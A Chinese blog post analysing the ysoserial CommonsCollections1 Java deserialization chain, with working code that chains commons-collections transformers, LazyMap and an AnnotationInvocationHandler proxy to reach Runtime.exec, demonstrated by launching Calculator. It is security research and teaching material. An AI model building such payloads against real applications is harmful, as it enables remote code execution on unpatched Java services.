• YsoSerial 工具常用Payload分析之CC1


    前文介绍了最简单的反序列化链URLDNS,虽然URLDNS本身不依赖第三方包且调用简单,但不能做到漏洞利用,仅能做漏洞探测,如何才能实现RCE呢,于是就有Common-collections1-7、Common-BeanUtils等这些三方库的利用。本文需要前置知识Java反射、动态代理等。CC1其实比较难,会用到很多高级特性,但理解了CC1后面的payload也就能轻松理解了。

    背景

    Common-collections是对jdk自带的数据类型的三方增强框架,类似python里面的collections包,common-collections 目前有两个分支,3.X和4.X,从pom文件里面可以看到两者的groupId与artifactId都不同,拥有不同的命名空间,所以可以在一个包里面可以同时使用。

    <dependency>
    			<groupId>commons-collections</groupId>
    			<artifactId>commons-collections</artifactId>
    			<version>3.1</version>
    </dependency>
    
    <dependency>
    			<groupId>org.apache.commons</groupId>
    			<artifactId>commons-collections4</artifactId>
    			<version>4.0</version>
    </dependency>
    

    这两个包大部分的用法都很类似,我们先来了解包里面很重要的四大Transform。

    Transformer

    要学习CC链(我把基于common-collections利用的链简称为CC链),首先得了解CC链中用到的类及方法的基础用法,我们需要了解CC中提供的四大Transformer。

    • InvokerTransformer
    • ConstantTransformer
    • ChainedTransformer
    • InstantiateTransformer

    这一篇文章先介绍前三种,后面介绍InstantiateTransformer

    InvokerTransformer

    在源码中,作者对这个类的解释是,这个类按照Transformer接口规范以反射的方式生成一个新对象

    image-20210723174023371

    我们就很清楚这个类就是拿来生成新对象的,并且是通过Transformer接口定义的transform()方法生成的,可以看到Transformer接口的描述

    image-20210723174047040

    InvokerTransformer的实现:

    public Object transform(Object input) {
            if (input == null) {
                return null;
            }
            try {
                Class cls = input.getClass();
                Method method = cls.getMethod(iMethodName, iParamTypes);
                return method.invoke(input, iArgs);
                    
            } catch (NoSuchMethodException ex) {
                throw new FunctorException("InvokerTransformer: The method '" + iMethodName + "' on '" + input.getClass() + "' does not exist");
            } catch (IllegalAccessException ex) {
                throw new FunctorException("InvokerTransformer: The method '" + iMethodName + "' on '" + input.getClass() + "' cannot be accessed");
            } catch (InvocationTargetException ex) {
                throw new FunctorException("InvokerTransformer: The method '" + iMethodName + "' on '" + input.getClass() + "' threw an exception", ex);
            }
        }
    

    其中的iMethodName、iParamTypes、iArgs来自于构造方法.

       public InvokerTransformer(String methodName, Class[] paramTypes, Object[] args) {
            super();
            iMethodName = methodName;
            iParamTypes = paramTypes;
            iArgs = args;
        }
    

    InvokerTransformer.transform(Object input) ,就是以反射方式执行input对象的传入构造方法中的method方法。

    其实common-collections的万恶之源也就是这个类,因为这个类能够根据传参动态生成新的对象,如果参数可控的情况下,我们可以用这个类来动态执行代码,如:

      InvokerTransformer invokerTransformer = new InvokerTransformer("exec",new Class[]{String.class},new Object[]{"/System/Applications/Calculator.app/Contents/MacOS/Calculator"});
    
      invokerTransformer.transform(Runtime.getRuntime());
    

    执行效果:

    image-20210722104543731

    ConstantTransformer

    ConstantTransformer 这个类功能比较简单,就是将初始化传入的对象变为final后执行transform返回。

    image-20210722105144056

    image-20210722105223495

     String test = new String("1111111");
     ConstantTransformer transformer =  new ConstantTransformer(test);
     Object obj =  transformer.transform(null);
    
     System.out.println(test.hashCode());
     System.out.println(obj.hashCode());
    

    代码执行后输出:

    image-20210722105607319

    可以通俗理解初始化传入什么transform就会返回什么。

    ChainedTransformer

    ChainedTransformer 理解起来可能会绕一些,初始化时传入transforms数组.

    public ChainedTransformer(Transformer[] transformers) {
            this.iTransformers = transformers;
    }
    

    执行transform方法时会遍历初始化传入的数组,并将上一个对象执行transforms的结果作为下一个对象执行transform的参数,以链式方式进行执行

    public Object transform(Object object) {
            for(int i = 0; i < this.iTransformers.length; ++i) {
                object = this.iTransformers[i].transform(object);
            }
            return object;
    }
    

    在已经清楚了InvokerTransformer、ConstantTransformer的情况下我们可以用他们精心构造一个transform数组来演示Chaninedtransformer。我们构造链一个Transformer数组,里面的元素有预先定义好的ConstantTransformer与InvokerTransformer。

    Transformer[] transformers = new Transformer[]{
                    new ConstantTransformer(Runtime.getRuntime()),
                    new InvokerTransformer("exec",new Class[]{String.class},new Object[]{"/System/Applications/Calculator.app/Contents/MacOS/Calculator"})
            };
    ChainedTransformer chainedTransformer = new ChainedTransformer(transformers);
    chainedTransformer.transform(null);
    

    执行chainedTransformer.transform(null)方法时,其实内部相当于是这么调用的:

    • obj1=new ConstantTransformer(Runtime.getRuntime()).transform(null)
    • obj2 = new InvokerTransformer("exec",new Class[]{String.class},new Object[]{"/System/Applications/Calculator.app/Contents/MacOS/Calculator"}).tranform(obj1)
    • Runtime.getRuntime()).exec("/System/Applications/Calculator.app/Contents/MacOS/Calculator")

    执行效果:

    image-20210722111137730

    挖掘利用链

    思路一

    在前面我们其实已经简单构造了一个恶意类了,即上面精心构造的chainedTransformer,我们只要去代码的海洋里面找到有谁会调用chainedTransformer的transform方法就能触发代码执行,然后安全人员就发现了两个方法可以对这个恶意类进一步的包装,使其变成一个通用的数据类型,一个是TransformedMap.decorate 另一个 lazyMap.decorate, 这两种方式都是对普通Map进行增强,使其在特定场合能够触发transform。也就是恶意类转变为了Map,使其利用更加通用。

    我们来看一下TransformedMap.decorate()这个方法吧,提供了三个参数 原始map、keyTransformer、valueTransformer

    image-20210722145330688

    跟进TransformerMap 发现其重写了map的许多方法,有checkSetValue、put、putAll ,增强map在执行这三个方法时就会执行初始化入参的Transformer.transform()方法,假如我们传入的就是我们构造的恶意chained Transformer ,那就成功的触发了恶意类。不过keytransform是对key进行执行,valueTransformer是对map的value执行,但其实父类的setValue也会调用checkSetValue,所以其实是有checkSetValue、put、putAll、setValue 调用就会触发恶意类执行。

    image-20210722151434781

    image-20210722154415555

    这个时候这个恶意类的使用范围就一下扩大了,毕竟很多地方都会对map进行put或者setValue的操作,那安全人员首先就找到了sun.reflect.annotation.AnnotationInvocationHandler 这个类,这是一个JDK自带的类(rt.jar/sun/reflect/annotation/AnnotationInvocationHandler),这个类在反序列化后经过一系列骚操作最后就会调用我们上面的恶意类,分析反序列化漏洞会先从类的readObject开始,看一下AnnotationInvocationHandler 的readObject方法(jdk1.8.20),我们之前说过只要对map进行checkSetValue、put、putAll、setValue就能触发恶意类执行,那在代码的293行就很明显有调用setValue方法。

    image-20210722154728811

    293行中的var5 其实是对象私有属性memberValue的值,只要我们将memberValue值赋于我们的恶意类,那这个漏洞是不是就串起来了。

    所以我们整理下,然后用自己的代码来实现验证:

    第一步,基于InvokeTransformer、ConstantTransformer生成一个恶意的ChainedTransformer

    public class Test {
        public static void main(String[] args) throws NoSuchMethodException, InvocationTargetException, IllegalAccessException, IOException {
            String cmd = "/System/Applications/Calculator.app/Contents/MacOS/Calculator";  //打开计算器,不同平台需要替换命令
            Transformer[] transformers =  new Transformer[]{
                    new ConstantTransformer(Runtime.class),
                    new InvokerTransformer("getMethod",new Class[]{String.class,Class[].class},new Object[]{"getRuntime",new Class[0]}),
                    new InvokerTransformer("invoke",new Class[]{Object.class,Object[].class},new Object[]{new Object(),new Object[0]}),
                    new InvokerTransformer("exec",new Class[]{String.class},new Object[]{cmd})
            };
            ChainedTransformer chainedTransformer = new ChainedTransformer(transformers);
            // chainedTransformer.transform(1); 测试触发
        }
    }
    

    这里可能会有人会疑问为啥这个transformers 数组会通过Runtime.class 去不断反射执行,而不是像之前介绍InvokeTransformer时直接使用getRuntime()呢,即下面的transform1和transfom2在生成chainedTransfomer时有什么区别:

     Transformer[] transformers1 =  new Transformer[]{
                    new ConstantTransformer(Runtime.class),
                    new InvokerTransformer("getMethod",new Class[]{String.class,Class[].class},new Object[]{"getRuntime",new Class[0]}),
                    new InvokerTransformer("invoke",new Class[]{Object.class,Object[].class},new Object[]{null,new Object[0]}),
                    new InvokerTransformer("exec",new Class[]{String.class},new Object[]{cmd})
            };
    
            Transformer[] transformers2 =  new Transformer[]{
                    new ConstantTransformer(Runtime.getRuntime()),
                    new InvokerTransformer("exec",new Class[]{String.class},new Object[]{cmd})
            };
    

    其实真正能够完成反序列化代码执行只有transformers1,为啥? 因为Java 要能完成序列化与反序列化要求这个被序列化的类有继承Serializable,而Runtime类没有继承,所以直接使用transformers2 就会报错。

    第二步,使用TransformedMap.decorate() 生成一个经过transformer增强的map恶意类

    这里我们使用生成一个原始的hashmap,key和value 先随便设,这里先留个心眼,等会我们还要回头看,TransformedMap 调用setValue实际上是调用了valueTransformer,所以应该将transfomer给到第三个参数。

    image-20210722163751377

    第二步代码如下

    //        第二步
            HashMap<String,String> hashMap = new HashMap<>();
            hashMap.put("testKey","testVal");  // 这个地方留坑
            Map evilMap = TransformedMap.decorate(hashMap,null,chainedTransformer);
    //        Map.Entry entry = (Map.Entry) evilMap.entrySet().iterator().next();
    //        entry.setValue("1");    测试触发
    

    第三步,给AnnotationInvocationHandler私有变量memberValues 赋值恶意对象

    AnnotationInvocationHandler 的构造函数没有用public修饰,没法直接通过new 的方式生成对象,所以我们要通过万能的反射获取构造方法,然后执行newInstance的方式来生成AnnotationInvocationHandler对象。其中构造方法第一个参数要求为Annotaion的子类,我们这里传入@Target,第二个参数即为我们想要赋值的变量memberValues。

    image-20210722165059364

    代码:

    //       第三步
            Class clazz = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler");
            Constructor constructor =  clazz.getDeclaredConstructor(Class.class,Map.class);  // 通过反射获取构造器
            constructor.setAccessible(true);  // 设置可以访问
            InvocationHandler evilHandler = (InvocationHandler) constructor.newInstance(Target.class, evilMap);  // 传入@target和恶意map
    

    第四步 反序列化触发

    //        第四步 
            String path = ExpUtils.serialize(evilHandler);  // 使用自己封装的序列化函数返回序列化文件的路径
            ExpUtils.unserialize(path);  // 反序列指定文件
    

    执行这所有步骤的代码,但并没有按照我们预期的执行命令然后弹出计算器。

    image-20210722171316772

    打上断点进行调试看一看

    image-20210722171855748

    原来在执行setvalue前有一个if分支,要求var7不为null,而这个var7 是AnnotationInvocationHandler构造传参的第一个注解参数获取我们恶意map的key的返回值,所以要是var7不为null,恶意map的key为一个有意义的值,那应该是啥呢,打开var3变量可以看到只要将key设置为value var7即可不为null。

    image-20210722172534475

    所以修改第二步hashMap中key为value,重新运行代码

    image-20210722172646854

    成功执行,没毛病~

    目前这个利用方式害只能在较低的jdk版本运行,1.8.71 以下,高版本移除了对memberValue的setValue方法

    image-20210722173049030

    其实这个思路和yso中cc1的利用链还不同,也就是这其实不是CC1 ,只是另外一种方式的利用方法,那真正的CC1是怎么利用的呢? 请看思路二

    思路二

    思路一是通过readObject中的存在触发函数而利用的,而思路二则是回归AnnotationInvocationHandler 这个类本身,AnnotationInvocationHandler 实现了InvocationHandler,而InvocationHandler 是作为jdk动态代理使用的,通过调用InvocationHandler中的invoke方法来对被代理对象进行增强。

    这里展开下动态代理吧

    JDK动态代理

    其实代理分为静态代理与动态代理,静态代理即手动的创建一个代理类,在代理类中调用原本的类,外界通过手动掉用代理的方式实现类被代理的效果,静态的方式有明显的缺点,如我想为某一个类增加一个埋点上报的功能,这个时候用静态代理没有问题,但我还有若干个类也想埋点上报这就需要我编写若干个代理类,不方便实际使用,所以动态代理就出来了,动态代理可以通过编写一个AnnotationInvocationHandler的实现类就可以为每一个想要增强的类实现类似的功能,非常灵活也减少了工作量。

    动态代理有很多种实现,总的分为:

    • 预编译方式 主要有AspectJ
    • 运行期动态代理 代表的有 JDK动态代理、CGLib动态代理,JDK动态代理只能代理实现了借口的类

    动态代理也是Spring核心技术AOP的重要实现方式,下面用一个实例演示JDK动态代理的使用。

    项目中存在

    image-20210722192146495

    Animal接口,定义了动物能干的事:

    package ProxyDemo;
    
    public interface Animal {
        public void eat();
    }
    

    CatImpl 实现了Animal接口

    package ProxyDemo;
    
    public class CatImpl implements Animal{
        @Override
        public void eat() {
            System.out.println("miao~");
        }
    }
    

    AnimalHandler 实现了InvocationHandler接口,重写后的大概逻辑就是在原对象运行的前后分别输出pre和after,注意点是原对象每次执行任意原方法如这里的eat都会调用handler中的invoke方法。

    package ProxyDemo;
    
    import java.lang.reflect.InvocationHandler;
    import java.lang.reflect.Method;
    
    public class AnimalHandler implements InvocationHandler {
    
        private final Object obj0;
    
        public AnimalHandler(Object obj0){
            this.obj0 = obj0;
        }
    
        @Override
        public Object invoke(Object proxy, Method method, Object[] args) throws Throwable {
            System.out.println("pre");
            Object res = method.invoke(obj0,args);
            System.out.println("after");
            return res;
        }
    }
    

    TestMain 中完成调用具体逻辑, 调用Proxy的静态方法newProxyInstance,分别传入classloader、原类接口、handler

    package ProxyDemo;
    
    import java.lang.reflect.InvocationHandler;
    import java.lang.reflect.Proxy;
    
    public class TestMain {
        public static void main(String[] args) {
            InvocationHandler handler = new AnimalHandler(new CatImpl());
            Animal cat = (Animal) Proxy.newProxyInstance(TestMain.class.getClassLoader(),CatImpl.class.getInterfaces(),handler);
            cat.eat();
        }
    }
    

    执型TestMain的main方法,结果:

    image-20210722193306517

    明显已经在原来输出miao~的前后加上了pre与after完成了增强,其实个人感觉这里特别像python的装饰器。

    介绍完JDK动态代理后我们回过头来看AnnotationInvocationHandler 这个类,我们发现它就是对InvocationHandler 的实现,具体Invoke逻辑如下:

    image-20210722193836152

    在53行代码中有对memberValue做get操作,回顾之前TransformedMap增强对hashmap会在setValue时候触发恶意类,那有没有可以通过执行get方法触发恶意类的方式呢? 答案是肯定的,就是通过开头我们提到的LazyMap.decorate ,Lazymap的大致功能根据字面意思也可以知道,就是提供懒加载的功能,具体到执行get方法是,先去判断map中是否存在这个key 如果没有就调用 LazyMap.decorate 初始化传入到transformer对象的transfrom方法,进而出发恶意transform。

    image-20210722194541979

    那思路其实就清晰了,反序列化过程中想办法调用AnnotationInvocationHandler 的invoke方法即可触发恶意类执行,那怎么调用invoke方法呢,因为AnnotationInvocationHandler本身就实现了invoke方法,所以我们直接用它作为动态代理的handler,只要原对象有执行任意方法即可调用invoker完成恶意类执行。这次甚至都不用管var7是否为null了,因为memberValues在其之前有执行entrySet方法,进而调用invoke,调用memberValues.get()方法触发恶意类。

    image-20210722195035709

    执行流程:

    1. AnnotationInvocationHandler.readObject()
    2. this.memberValues.entrySet()
    3. AnnotationInvocationHandler.invoke()
    4. this.memberValues.get()
    5. Lazy map.get()
    6. ChainedTransformed.transform()
    7. Runtime.getRuntime().exec(cmd)

    那我们用自己的代码来实现以下:

    第一步 生成LazyMap增强后的map,chainedTransform生成和思路一一样

    //        chainedTransformer 和思路一生成方式一致
            String cmd = "/System/Applications/Calculator.app/Contents/MacOS/Calculator";
            Transformer[] transformers =  new Transformer[]{
                    new ConstantTransformer(Runtime.class),
                    new InvokerTransformer("getMethod",new Class[]{String.class,Class[].class},new Object[]{"getRuntime",new Class[0]}),
                    new InvokerTransformer("invoke",new Class[]{Object.class,Object[].class},new Object[]{null,new Object[0]}),
                    new InvokerTransformer("exec",new Class[]{String.class},new Object[]{cmd})
            };
    
            ChainedTransformer chainedTransformer = new ChainedTransformer(transformers);
            HashMap<String,String> hashMap = new HashMap<>();
            hashMap.put("testKey","testVal");
            Map evilMap = LazyMap.decorate(hashMap,chainedTransformer);  //  使用lazyMap增强
    

    第二步 生成AnnotationInvocationHandler 对象

    同思路一一致,通过反射获取构造函数的方式生成AnnotationInvocationHandler对象

    		Class clazz = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler");
            Constructor constructor =  clazz.getDeclaredConstructor(Class.class,Map.class);  // 反射获取构造函数
            constructor.setAccessible(true);
            InvocationHandler evilHandler = (InvocationHandler) constructor.newInstance(Target.class, evilMap);  // 执行构造函数生成对象,传入lazyMap
    

    第三步 通过动态代理使用第二步AnnotationInvocationHandler的代理lazyMap,并将其作为构造方法参数赋值给memberValues

      Map evilLazyMap = (Map) Proxy.newProxyInstance(Test2.class.getClassLoader(),evilMap.getClass().getInterfaces(),evilHandler);
      InvocationHandler finalEvilHandler = (InvocationHandler) constructor.newInstance(Target.class, evilLazyMap);  // 传入代理lazyMap
    

    第四步 序列化反序列化触发

            String path =  ExpUtils.serialize(finalEvilHandler);
            ExpUtils.unserialize(path);
    

    完美触发,没毛病~

    image-20210722201030261

    思路二就是CC1链的主要逻辑,但CC1在8u71后不能使用,我们对比下新老版本,分析一下原因

    image-20210722201339686

    左边为新版本右边为旧版本,可以看到在新版jdk中,反序列化不再通过defaultReadObject方式,而是通过readFields 来获取几个特定的属性,这两种方式有什么区别呢,经过我自己多次调试发现defaultReadObject 可以恢复对象本身的类属性,比如this.memberValues 就能恢复成我们原本设置的恶意类,但通过readFields方式,this.memberValues 就为null,所以后续执行get()就必然没发触发,这也就是高版本不能使用的原因,网上大多会说是因为取消了SetValue导致不能触发,但其实不然,思路一确实是因为这个原因,但CC1和取消setValue没有半毛钱关系。

    总结

    经过洋洋洒洒4000多字分析了AnnotationInvocationHandler的两种思路上的利用方式,其中YSO工具中CC1链就是本文中的思路二,CC1 用到了很多高级特性,理解上可能会比较困难,但只要搞懂了后续的链也就很轻松了,目前CC1还只能在低于8u71的版本利用或者比修复这个漏洞前的版本,那如果对方机器是高版本且为Common-collections4 呢,后续的CC2 就来看看Common-collections4下的利用。

    p神代码审计知识星球
    https://xz.aliyun.com/t/7031#toc-2

    公众号

    欢迎关注我的公众号!

  • 相关阅读:
    软件开发模式
    my parnter code review
    官僚模式和功能团队模式的优缺点
    思考题
    my code review
    四则运算
    Android Studio下使用Junit框架测试数组和
    SQL2008 存储过程 增删改查例子
    NET 无法显示XML页怎么办
    vs2010 2005 2008 代码前面出现··········取消方法
  • 原文地址:https://www.cnblogs.com/9eek/p/15050035.html
Copyright © 2020-2023  润新知